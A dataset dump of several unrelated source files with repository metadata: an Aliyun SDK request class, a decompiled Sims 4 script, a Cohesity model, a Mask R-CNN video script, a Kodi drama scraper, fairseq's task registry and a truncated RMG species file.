blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
400047e04233a252d0fb35fe927e52d1a4db4639 | 83de24182a7af33c43ee340b57755e73275149ae | /aliyun-python-sdk-sas/aliyunsdksas/request/v20181203/PublicSyncAndCreateImageScanTaskRequest.py | c9bf921c804bb10a29eeaa44219a878d31ae55d6 | [
"Apache-2.0"
] | permissive | aliyun/aliyun-openapi-python-sdk | 4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f | 83fd547946fd6772cf26f338d9653f4316c81d3c | refs/heads/master | 2023-08-04T12:32:57.028821 | 2023-08-04T06:00:29 | 2023-08-04T06:00:29 | 39,558,861 | 1,080 | 721 | NOASSERTION | 2023-09-14T08:51:06 | 2015-07-23T09:39:45 | Python | UTF-8 | Python | false | false | 1,646 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdksas.endpoint import endpoint_data
class PublicSyncAndCreateImageScanTaskRequest(RpcRequest):
	"""RPC request wrapper for the Sas 'PublicSyncAndCreateImageScanTask' API (version 2018-12-03)."""

	def __init__(self):
		RpcRequest.__init__(self, 'Sas', '2018-12-03', 'PublicSyncAndCreateImageScanTask')
		self.set_method('POST')
		# Attach endpoint routing tables when the core SDK exposes these hooks.
		if hasattr(self, "endpoint_map"):
			setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
		if hasattr(self, "endpoint_regional"):
			setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())

	def get_Images(self): # String
		params = self.get_query_params()
		return params.get('Images')

	def set_Images(self, Images): # String
		self.add_query_param('Images', Images)

	def get_SourceIp(self): # String
		params = self.get_query_params()
		return params.get('SourceIp')

	def set_SourceIp(self, SourceIp): # String
		self.add_query_param('SourceIp', SourceIp)
| [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
fff0e6483247918bc0215838062d0a78d3f2aa30 | b3b68efa404a7034f0d5a1c10b281ef721f8321a | /Scripts/simulation/venues/karaoke_venue/karaoke_duet_individualsim_situation.py | 3c1e72aaa8387818454955a79a9a54b702283a3c | [
"Apache-2.0"
] | permissive | velocist/TS4CheatsInfo | 62195f3333076c148b2a59f926c9fb5202f1c6fb | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | refs/heads/main | 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,245 | py | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\venues\karaoke_venue\karaoke_duet_individualsim_situation.py
# Compiled at: 2016-07-16 01:45:12
# Size of source mod 2**32: 2320 bytes
from sims4.tuning.instances import lock_instance_tunables
from situations.bouncer.bouncer_types import BouncerExclusivityCategory
from situations.situation import Situation
from situations.situation_complex import SituationState, TunableSituationJobAndRoleState, SituationComplexCommon, SituationStateData
from situations.situation_types import SituationCreationUIOption
class KaraokeDuetState(SituationState):
    # The single, no-op situation state used by KaraokeDuetSimSituation below.
    pass
class KaraokeDuetSimSituation(SituationComplexCommon):
    """Situation that tracks a single Sim assigned to the karaoke singer job."""

    INSTANCE_TUNABLES = {'karaoke_singer_job': TunableSituationJobAndRoleState(description='\n        The default job and role for a Sim in this situation. They only\n        have one role, so this is what will be given for them to do.\n        ')}
    REMOVE_INSTANCE_TUNABLES = Situation.NON_USER_FACING_REMOVE_INSTANCE_TUNABLES

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # The Sim currently holding the singer job; assigned in _on_set_sim_job().
        self._duet_sim = None

    @classmethod
    def _get_tuned_job_and_default_role_state_tuples(cls):
        singer = cls.karaoke_singer_job
        return [(singer.job, singer.role_state)]

    @classmethod
    def default_job(cls):
        return cls.karaoke_singer_job.job

    @classmethod
    def _states(cls):
        return (SituationStateData(1, KaraokeDuetState),)

    def _on_set_sim_job(self, sim, job_type):
        super()._on_set_sim_job(sim, job_type)
        self._duet_sim = sim

    def start_situation(self):
        super().start_situation()
        self._change_state(KaraokeDuetState())

    def sim_of_interest(self, sim_info):
        # True only for the sim_info of the Sim holding the duet job.
        duet = self._duet_sim
        return duet is not None and duet.sim_info is sim_info
lock_instance_tunables(KaraokeDuetSimSituation, exclusivity=(BouncerExclusivityCategory.NORMAL),
creation_ui_option=(SituationCreationUIOption.NOT_AVAILABLE),
_implies_greeted_status=False) | [
"cristina.caballero2406@gmail.com"
] | cristina.caballero2406@gmail.com |
a9e79ced7f79f55849f13742310819e73a64dfb1 | 09f8a3825c5109a6cec94ae34ea17d9ace66f381 | /cohesity_management_sdk/models/cassandra_protection_source.py | c79152ddb527ab066e9f0f7c688e1e1fb21e2b99 | [
"Apache-2.0"
] | permissive | cohesity/management-sdk-python | 103ee07b2f047da69d7b1edfae39d218295d1747 | e4973dfeb836266904d0369ea845513c7acf261e | refs/heads/master | 2023-08-04T06:30:37.551358 | 2023-07-19T12:02:12 | 2023-07-19T12:02:12 | 134,367,879 | 24 | 20 | Apache-2.0 | 2023-08-31T04:37:28 | 2018-05-22T06:04:19 | Python | UTF-8 | Python | false | false | 3,340 | py | # -*- coding: utf-8 -*-
# Copyright 2023 Cohesity Inc.
import cohesity_management_sdk.models.cassandra_cluster
import cohesity_management_sdk.models.cassandra_keyspace
class CassandraProtectionSource(object):
"""Implementation of the 'CassandraProtectionSource' model.
Specifies an Object representing Cassandra.
Attributes:
cluster_info (CassandraCluster): Information of a Cassandra cluster,
only valid for an entity of type kCluster.
keyspace_info (CassandraKeyspace): Information of a cassandra
keyspapce, only valid for an entity of type kKeyspace.
name (string): Specifies the instance name of the Cassandra entity.
mtype (TypeCassandraProtectionSourceEnum): Specifies the type of the
managed Object in Cassandra Protection Source. Replication strategy
options for a keyspace. 'kCluster' indicates a Cassandra cluster
distributed over several physical nodes. 'kKeyspace' indicates a
Keyspace enclosing one or more tables. 'kTable' indicates a Table
in the Cassandra environment.
uuid (string): Specifies the UUID for the Cassandra entity. Note : For
each entity an ID unique within top level entity should be assigned
by imanis backend. Example, UUID for a table can be the string
<keyspace_name>.<table_name>
"""
# Create a mapping from Model property names to API property names
_names = {
"cluster_info":'clusterInfo',
"keyspace_info":'keyspaceInfo',
"name":'name',
"mtype":'type',
"uuid":'uuid',
}
def __init__(self,
cluster_info=None,
keyspace_info=None,
name=None,
mtype=None,
uuid=None,
):
"""Constructor for the CassandraProtectionSource class"""
# Initialize members of the class
self.cluster_info = cluster_info
self.keyspace_info = keyspace_info
self.name = name
self.mtype = mtype
self.uuid = uuid
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
cluster_info = cohesity_management_sdk.models.cassandra_cluster.CassandraCluster.from_dictionary(dictionary.get('clusterInfo')) if dictionary.get('clusterInfo') else None
keyspace_info = cohesity_management_sdk.models.cassandra_keyspace.CassandraKeyspace.from_dictionary(dictionary.get('keyspaceInfo')) if dictionary.get('keyspaceInfo') else None
name = dictionary.get('name')
mtype = dictionary.get('type')
uuid = dictionary.get('uuid')
# Return an object of this model
return cls(
cluster_info,
keyspace_info,
name,
mtype,
uuid
) | [
"naveena.maplelabs@cohesity.com"
] | naveena.maplelabs@cohesity.com |
c57bd4cdfecc79a54141289af0ac284ba85f3d3b | bc42b7700ccc0014282f943a20f968dc2172c4c5 | /Day6 : Mask-RCNN on Videos/mask_rcnn_videos.py | 6b1dbe56385fa9916b3bc62811e774e2ed2e25bb | [] | no_license | vgaurav3011/100-days-of-ML-Code-2 | 1a4b6836ac1b378caeed63a253a3d2b71bada32f | 339992040d807f1c382c858b53e35ed2699518d9 | refs/heads/master | 2022-04-27T07:30:10.797553 | 2020-04-22T07:37:53 | 2020-04-22T07:37:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,340 | py | import numpy as np
import random
import time
import cv2
import imutils
import os

# Detection thresholds: minimum class confidence to keep a detection, and the
# cutoff used to binarize the predicted soft mask.
confi = 0.5
threshold = 0.3

# Load the COCO class labels the Mask R-CNN was trained on.  A context manager
# closes the label file (the original left the open() handle dangling).
labelsPath = 'assets/object_detection_classes_coco.txt'
with open(labelsPath) as label_file:
    LABELS = label_file.read().strip().split("\n")

# One reproducible random color per class label, used to tint the masks.
np.random.seed(42)
COLORS = np.random.randint(0, 255, size=(len(LABELS), 3),
    dtype="uint8")

# Load the serialized Mask R-CNN (TensorFlow frozen graph + pbtxt config).
weightsPath = 'assets/frozen_inference_graph.pb'
configPath = 'assets/mask_rcnn_inception_v2_coco_2018_01_28.pbtxt'
print("loading the model........")
net = cv2.dnn.readNetFromTensorflow(weightsPath, configPath)

# Open the input video; the output writer is created lazily on the first frame.
video_dir = 'videos/2.mp4'
vs = cv2.VideoCapture(video_dir)
writer = None

# Try to determine the total number of frames so we can estimate runtime.
try:
    prop = cv2.cv.CV_CAP_PROP_FRAME_COUNT if imutils.is_cv2() \
        else cv2.CAP_PROP_FRAME_COUNT
    total = int(vs.get(prop))
    print("{} total frames in video".format(total))
except Exception:
    print("could not determine # of frames in video")
    total = -1

# loop over frames from the video file stream
while True:
    # read the next frame from the file; an un-grabbed frame means end of stream
    (grabbed, frame) = vs.read()
    if not grabbed:
        break

    # Forward pass of the Mask R-CNN: yields (1) bounding-box coordinates of
    # the detected objects and (2) a pixel-wise segmentation mask per object.
    blob = cv2.dnn.blobFromImage(frame, swapRB=True, crop=False)
    net.setInput(blob)
    start = time.time()
    (boxes, masks) = net.forward(["detection_out_final",
        "detection_masks"])
    end = time.time()

    # loop over the number of detected objects
    for i in range(0, boxes.shape[2]):
        # class ID and confidence (probability) of this detection
        classID = int(boxes[0, 0, i, 1])
        confidence = boxes[0, 0, i, 2]

        # filter out weak predictions
        if confidence > confi:
            # scale the normalized box back to frame coordinates
            (H, W) = frame.shape[:2]
            box = boxes[0, 0, i, 3:7] * np.array([W, H, W, H])
            (startX, startY, endX, endY) = box.astype("int")
            boxW = endX - startX
            boxH = endY - startY

            # resize the soft mask to the box size, then threshold it into a
            # binary mask
            mask = masks[i, classID]
            mask = cv2.resize(mask, (boxW, boxH),
                interpolation=cv2.INTER_NEAREST)
            mask = (mask > threshold)

            # masked pixels of the ROI only
            roi = frame[startY:endY, startX:endX][mask]

            # blend the class color with the ROI for a transparent overlay
            color = COLORS[classID]
            blended = ((0.4 * color) + (0.6 * roi)).astype("uint8")
            frame[startY:endY, startX:endX][mask] = blended

            # draw the bounding box and the label with its probability
            color = [int(c) for c in color]
            cv2.rectangle(frame, (startX, startY), (endX, endY),
                color, 2)
            text = "{}: {:.4f}".format(LABELS[classID], confidence)
            cv2.putText(frame, text, (startX, startY - 5),
                cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)

    # lazily initialize the video writer once the first frame size is known
    if writer is None:
        fourcc = cv2.VideoWriter_fourcc(*"MJPG")
        writer = cv2.VideoWriter('output/output', fourcc, 30,
            (frame.shape[1], frame.shape[0]), True)

    # per-frame timing and remaining-time estimate (only when total is known)
    if total > 0:
        elap = (end - start)
        print("[INFO] single frame took {:.4f} seconds".format(elap))
        print("[INFO] estimated total time to finish: {:.4f}".format(
            elap * total))

    # write the output frame to disk
    writer.write(frame)

# release the file pointers
print("[INFO] cleaning up...")
if writer is not None:
    # writer stays None when no frame was ever read (e.g. unreadable video);
    # the original unconditionally called release() and crashed in that case.
    writer.release()
vs.release()
| [
"you@example.com"
] | you@example.com |
91203a59c466da8892ee586d81d8a79b679862ea | 675afeffeda042e39c2bf7453d0f9ee890e7fad0 | /backend/behavior/apps.py | a67424e3f6f777f3e2975ea22c28f86f5a5abe2a | [] | no_license | crowdbotics-apps/behavior-management-25412 | fd4e20d5201cd861f59cc87252a7a7c518ba1d8d | 18dc5330650268f54aa8021c013a71cfdc6eabac | refs/heads/master | 2023-04-04T07:36:17.045282 | 2021-04-08T13:58:10 | 2021-04-08T13:58:10 | 353,739,891 | 0 | 0 | null | 2021-04-08T13:58:11 | 2021-04-01T15:12:20 | Python | UTF-8 | Python | false | false | 91 | py | from django.apps import AppConfig
class BehaviorConfig(AppConfig):
    """Django application configuration for the ``behavior`` app."""
    # Label under which Django registers this application.
    name = "behavior"
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
db837659d0416abcd64e830e6dd62418e2d5388a | 01fa2aca31eb73a559d192fd29e44350f26a13a9 | /HAX/18.CocoJoe/script.module.lambdascrapers/lib/lambdascrapers/sources_scrubs/ko/drama4u.py | 1cb35e3200c5d19d766ec5ba2e8f07258beb26e7 | [
"Beerware"
] | permissive | RandomIntermition/k4y108837s | b4beedeff375645bd4fa9ad348631a9a9f3640b6 | e9115aad49795dfe30a96c278cedaf089abcc11d | refs/heads/master | 2022-05-01T18:45:57.298903 | 2022-03-30T03:41:08 | 2022-03-30T03:41:08 | 109,356,425 | 1 | 0 | null | 2019-11-08T02:20:47 | 2017-11-03T05:36:48 | Python | UTF-8 | Python | false | false | 5,121 | py | # -*- coding: UTF-8 -*-
# -Cleaned and Checked on 11-23-2018 by JewBMX in Scrubs.
# Only browser checks for active domains.
import re,urllib,urlparse
from resources.lib.modules import cleantitle,client,directstream,source_utils,dom_parser
class source:
    """Scraper provider for 4udrama.com (Korean-language streams)."""
    def __init__(self):
        # Provider metadata read by the scraper framework.
        self.priority = 1
        self.language = ['ko']
        self.domains = ['4udrama.com'] # old drama4u.us
        self.base_link = 'https://4udrama.com'
        self.search_link = '/search?s=%s'
    def movie(self, imdb, title, localtitle, aliases, year):
        """Resolve a movie to its site-relative URL (first episode link).
        Tries the localized title first, then the original title.  Any
        scraping failure returns None (best-effort convention).
        """
        try:
            url = self.__search([localtitle] + source_utils.aliases_to_array(aliases))
            if not url and title != localtitle: url = self.__search([title] + source_utils.aliases_to_array(aliases))
            return self.__get_episode_link(url)
        except:
            return
    def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
        """Resolve a TV show to its site-relative URL, or None on failure."""
        try:
            url = self.__search([localtvshowtitle] + source_utils.aliases_to_array(aliases))
            if not url and tvshowtitle != localtvshowtitle: url = self.__search([tvshowtitle] + source_utils.aliases_to_array(aliases))
            return url
        except:
            return
    def episode(self, url, imdb, tvdb, title, premiered, season, episode):
        """Map a show URL plus an episode number to that episode's page URL."""
        return self.__get_episode_link(url, episode)
    def sources(self, url, hostDict, hostprDict):
        """Scrape stream links for a previously resolved page URL.
        Returns a list of source dicts.  NOTE(review): the early ``return``
        when url is falsy yields None rather than [] -- callers appear to
        tolerate this, but verify against the framework.
        """
        sources = []
        try:
            if not url:
                return
            url = urlparse.urljoin(self.base_link, url)
            r = client.request(url)
            # Collect the embedded player iframe URLs from the page.
            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'tab-pane'})
            r = dom_parser.parse_dom(r, 'iframe', req='src')
            r = [i.attrs['src'] for i in r]
            for i in r:
                try:
                    if 'drama4u' in i or 'k-vid' in i:
                        # Self-hosted player: pull the JS `source = [...]` array
                        # and extract file/label pairs in either attribute order.
                        r = client.request(i, referer=url)
                        r = re.findall('''var\s*source\s*=\s*\[({.*?})\]\s*;''', r)[0]
                        i = [(match[1], match[0]) for match in re.findall('''["']?label\s*["']?\s*[:=]\s*["']?([^"',]+)["']?(?:[^}\]]+)["']?\s*file\s*["']?\s*[:=,]?\s*["']([^"']+)''', r, re.DOTALL)]
                        i += [(match[0], match[1]) for match in re.findall('''["']?\s*file\s*["']?\s*[:=,]?\s*["']([^"']+)(?:[^}>\]]+)["']?\s*label\s*["']?\s*[:=]\s*["']?([^"',]+)''', r, re.DOTALL)]
                        r = [(x[0].replace('\/', '/'), source_utils.label_to_quality(x[1])) for x in i]
                        # De-duplicate, then classify each URL as a Google video
                        # stream or a generic direct CDN link.
                        for u, q in list(set(r)):
                            try:
                                tag = directstream.googletag(u)
                                if tag:
                                    sources.append({'source': 'gvideo', 'quality': tag[0].get('quality', 'SD'), 'language': 'ko', 'url': u, 'direct': True, 'debridonly': False})
                                else:
                                    sources.append({'source': 'CDN', 'quality': q, 'language': 'ko', 'url': u, 'direct': True, 'debridonly': False})
                            except:
                                pass
                    else:
                        # Third-party hoster: keep only hosts present in hostDict.
                        valid, host = source_utils.is_host_valid(i, hostDict)
                        if not valid: continue
                        sources.append({'source': host, 'quality': 'SD', 'language': 'ko', 'url': i, 'direct': False, 'debridonly': False})
                except:
                    pass
            return sources
        except:
            return sources
    def resolve(self, url):
        """URLs need no post-processing; returned unchanged."""
        return url
    def __search(self, titles):
        """Search the site for any of the given titles; return the relative
        URL of the first result whose cleaned title matches, else None.
        """
        try:
            query = self.search_link % urllib.quote_plus(cleantitle.query(titles[0]))
            query = urlparse.urljoin(self.base_link, query)
            # Cleaned candidate titles used for the match test below.
            t = [cleantitle.get(i) for i in set(titles) if i]
            r = client.request(query)
            r = dom_parser.parse_dom(r, 'div', attrs={'id': 'container-search'})
            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'movie-cat'})
            r = dom_parser.parse_dom(r, 'h4', attrs={'class': 'title'})
            r = dom_parser.parse_dom(r, 'a', req=['title', 'href'])
            r = [(i.attrs['href'], i.attrs['title']) for i in r]
            r = [(i[0]) for i in r if cleantitle.get(i[1]) in t][0]
            return source_utils.strip_domain(r)
        except:
            return
    def __get_episode_link(self, url, episode='1'):
        """Return the relative link whose label ends in 'EP <episode>' from the
        page's episode list (default episode '1'), or None on failure.
        """
        try:
            if not url:
                return
            url = urlparse.urljoin(self.base_link, url)
            r = client.request(url)
            r = dom_parser.parse_dom(r, 'div', attrs={'id': 'list-espisode'})
            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'movie-item-espisode'})
            r = dom_parser.parse_dom(r, 'a', req='href')
            r = [(i.attrs['href'], i.content) for i in r]
            r = [(i[0], re.findall('EP\s*(\d+)$', i[1])) for i in r]
            r = [i[0] for i in r if i[1] and int(i[1][0]) == int(episode)][0]
            return source_utils.strip_domain(r)
        except:
            return
| [
"github+github@github.github"
] | github+github@github.github |
5cb5741e1ccf992fab5d6962ca406c0996b96972 | 5e8342e4f6e48688f4a0079310e8f0b5e5386044 | /POO/Alumnos/profesor.py | 7aa8c1fac4b48d3b71088e1d6df86f077606537f | [] | no_license | fernado1981/python_ | 27a154406b5fba7e18da418bc5f75c58f3ccc24f | 7d846cd332405464fa14707ea3f2286a918fc9de | refs/heads/master | 2023-02-15T19:30:02.257345 | 2021-01-21T10:35:46 | 2021-01-21T10:35:46 | 277,186,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,272 | py | class profesor:
    # A student with this many (or more) amonestaciones is suspended.
    limit = 3
    def __init__(self, alumnado, name):
        # alumnado: dict of student-name -> record dict; the records carry the
        # keys 'aprobar' (bool) and 'amonestaciones' (int) used by the methods.
        # name: key of the single student this instance operates on.
        self.alumnos = alumnado
        self.name = name
def aprobar(self):
if self.name in self.alumnos:
for c, v in self.alumnos.items():
if c == self.name:
v['aprobar'] = True
def suspender(self):
for c, v in self.alumnos.items():
if c == self.name:
v['aprobar'] = False
def amonestaciones(self, num):
for c, v in self.alumnos.items():
if c == self.name:
v['amonestaciones'] = num
if v['amonestaciones'] >= self.limit:
self.suspender()
def desamonestar(self, num):
for c, v in self.alumnos.items():
if c == self.name:
v['amonestaciones'] -= num
if v['amonestaciones'] < 3:
v['aprobar'] = True
def verAlumnado(self):
for c,v in self.alumnos.items():
print(c, v)
def suspensos(self):
for c,v in self.alumnos.items():
if not v['aprobar']:
print(c,v)
def aprobados(self):
for c, v in self.alumnos.items():
if v['aprobar']:
print(c, v)
| [
"fernando.manrique.villanueva@gmail.com"
] | fernando.manrique.villanueva@gmail.com |
14559afff0cea58f13cdd39a5f7e9f4982efc821 | 246ec8733c63a28518160af8fc9e21ae04f76649 | /fairseq/tasks/__init__.py | 92f9d53190d0779fc407d6a8cdfd932a63079362 | [
"MIT"
] | permissive | fyabc/BT4MolGen | 80050dc24031753fa3052ef60a5bea170d9d9c56 | 05d161ae9a7dbbcc3c95c71417d5e7f92ed0572c | refs/heads/master | 2023-05-29T01:38:36.614479 | 2021-06-18T15:56:13 | 2021-06-18T15:56:13 | 370,941,322 | 5 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,494 | py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import importlib
import os
from .fairseq_task import FairseqTask
# Maps registered task name -> task class (filled by @register_task).
TASK_REGISTRY = {}
# Task class names seen so far; enforces globally unique class names.
TASK_CLASS_NAMES = set()
def setup_task(args, **kwargs):
    """Look up ``args.task`` in the registry and instantiate that task."""
    task_cls = TASK_REGISTRY[args.task]
    return task_cls.setup_task(args, **kwargs)
def register_task(name):
    """Class decorator that adds a new task to the fairseq task registry.

    Usage::

        @register_task('classification')
        class ClassificationTask(FairseqTask):
            (...)

    .. note::

        Every registered task must subclass
        :class:`~fairseq.tasks.FairseqTask`.

    Args:
        name (str): the name under which the task is registered
    """

    def _register(cls):
        # Reject duplicate names and non-FairseqTask classes before touching
        # either registry, so a failed registration leaves no partial state.
        if name in TASK_REGISTRY:
            raise ValueError('Cannot register duplicate task ({})'.format(name))
        if not issubclass(cls, FairseqTask):
            raise ValueError('Task ({}: {}) must extend FairseqTask'.format(name, cls.__name__))
        if cls.__name__ in TASK_CLASS_NAMES:
            raise ValueError('Cannot register task with duplicate class name ({})'.format(cls.__name__))
        TASK_REGISTRY[name] = cls
        TASK_CLASS_NAMES.add(cls.__name__)
        return cls

    return _register
# automatically import any Python files in the tasks/ directory
tasks_dir = os.path.dirname(__file__)
for file in os.listdir(tasks_dir):
    path = os.path.join(tasks_dir, file)
    # Consider every non-private .py module and every package sub-directory.
    if not file.startswith('_') and (file.endswith('.py') or os.path.isdir(path)):
        task_name = file[:file.find('.py')] if file.endswith('.py') else file
        # Importing the module executes its @register_task decorators,
        # which populates TASK_REGISTRY as a side effect.
        importlib.import_module('fairseq.tasks.' + task_name)
        # expose `task_parser` for sphinx
        if task_name in TASK_REGISTRY:
            parser = argparse.ArgumentParser(add_help=False)
            group_task = parser.add_argument_group('Task name')
            # fmt: off
            group_task.add_argument('--task', metavar=task_name,
                                    help='Enable this task with: ``--task=' + task_name + '``')
            # fmt: on
            group_args = parser.add_argument_group('Additional command-line arguments')
            TASK_REGISTRY[task_name].add_args(group_args)
            globals()[task_name + '_parser'] = parser
def get_task(name):
return TASK_REGISTRY[name]
| [
"fyabc@mail.ustc.edu.cn"
] | fyabc@mail.ustc.edu.cn |
dd82e1fdbc12fe353273aa0cb0856e221ae8ae1f | 04803c70bb97012b7d500a177ac0240fb2ddbe38 | /1heptane/pdep/network80_2.py | ba991ad5df7eb1552abf800c3f4a2b3950a8c035 | [] | no_license | shenghuiqin/chpd | 735e0415f6688d88579fc935459c1b0f53596d1d | 396ba54629036e3f2be0b3fabe09b78c90d56939 | refs/heads/master | 2023-03-01T23:29:02.118150 | 2019-10-05T04:02:23 | 2019-10-05T04:02:23 | 192,084,217 | 0 | 0 | null | 2019-06-18T18:33:13 | 2019-06-15T13:52:28 | HTML | UTF-8 | Python | false | false | 17,219 | py | species(
label = 'CH2OH(24)',
structure = SMILES('[CH2]O'),
E0 = (-28.7184,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,3003.59,4000],'cm^-1')),
HinderedRotor(inertia=(0.057913,'amu*angstrom^2'), symmetry=1, barrier=(25.9304,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (31.0339,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3467.15,'J/mol'), sigma=(3.69,'angstroms'), dipoleMoment=(1.7,'De'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=2.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.47834,-0.0013507,2.78485e-05,-3.64869e-08,1.47907e-11,-3500.73,3.30913], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[5.09314,0.00594761,-2.06497e-06,3.23008e-10,-1.88126e-14,-4034.1,-1.84691], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-28.7184,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(103.931,'J/(mol*K)'), label="""CH2OH""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'CH3O(25)',
structure = SMILES('C[O]'),
E0 = (10.474,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (31.0339,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3467.15,'J/mol'), sigma=(3.69,'angstroms'), dipoleMoment=(1.7,'De'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=2.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.71181,-0.00280463,3.76551e-05,-4.73072e-08,1.86588e-11,1295.7,6.57241], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.75779,0.00744142,-2.69705e-06,4.38091e-10,-2.63537e-14,378.112,-1.9668], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(10.474,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(108.088,'J/(mol*K)'), label="""CH3O""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'H(3)',
structure = SMILES('[H]'),
E0 = (211.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25472.7,-0.459566], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25472.7,-0.459566], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.792,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CH2O(15)',
structure = SMILES('C=O'),
E0 = (-119.055,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (30.026,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(4140.62,'J/mol'), sigma=(3.59,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=2.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
